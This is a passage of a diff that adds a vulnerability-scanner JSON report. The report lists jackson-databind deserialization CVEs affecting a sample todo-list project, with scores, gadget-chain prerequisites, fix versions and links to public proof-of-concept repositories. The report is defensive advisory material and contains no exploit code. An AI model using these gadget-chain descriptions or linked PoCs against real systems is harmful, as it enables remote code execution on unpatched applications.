"[2.8.0,2.8.10)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.1", + "2.7.9.1", + "2.8.10" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/e8f043d1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1680", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1737", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1506612", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:53.619980Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:46.857906Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:13.013603Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:53.619980Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:46.857906Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e8f043d1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1680)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1737)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1506612)\n", + "epssDetails": { + "percentile": "0.92802", + "probability": "0.04801", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-15095" + ], + "CWE": [ + "CWE-184" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2017-11-07T13:13:32.343000Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-06-26T21:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2017-11-09T03:13:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:46.857906Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Imre Rad" + ], + "semver": { + "vulnerable": [ + "[,2.8.11)", + "[2.9.0,2.9.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.8.11", + "2.9.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1855", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/irsl/jackson-rce-via-spel/", + "title": "PoC Project" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:06.545272Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:58.597489Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.686860Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:06.545272Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:58.597489Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1855)\n- [PoC Project](https://github.com/irsl/jackson-rce-via-spel/)\n", + "epssDetails": { + "percentile": "0.95701", + "probability": "0.13977", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-17485" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-01-11T11:41:28.547000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-01-10T11:41:28Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-01-22T12:30:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:58.597489Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.8.11" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Rui Chong" + ], + "semver": { + "vulnerable": [ + "[,2.8.11)", + "[2.9.0,2.9.4)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.8.11", + "2.9.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1899", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:48.440088Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:59.857985Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:07.715996Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:48.440088Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:59.857985Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) and [CVE-2017-17485](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043)). This is exploitable via two different gadgets that bypass a blacklist.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1899)\n", + "epssDetails": { + "percentile": "0.94704", + "probability": "0.09270", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-5968" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-w3f4-3q6j-rh82" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-01-22T15:40:18.105000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-01-18T15:40:18Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-01-23T13:17:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.857985Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.8.11" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.5)", + "[2.7.0, 2.8.11.1)", + "[2.9.0, 2.9.5)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.5", + "2.8.11.1", + "2.9.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11.1)", + "[2.9.0,2.9.5)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1931", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:58.671582Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:49.486075Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.859910Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:58.671582Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.486075Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the `c3p0` libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.5, 2.8.11.1, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1931)\n", + "epssDetails": { + "percentile": "0.99133", + "probability": "0.93631", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-7489" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cggj-fvv3-cqwv" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-02-26T15:13:40.723000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11.1)", + "[2.9.0,2.9.5)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-02-10T15:13:40Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-02-26T15:13:40Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.486075Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.5" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.9.1", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2341", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/Al1ex/CVE-2019-12814", + "title": "PoC Repository" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:36.647712Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:50.077144Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:15.371549Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.647712Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": 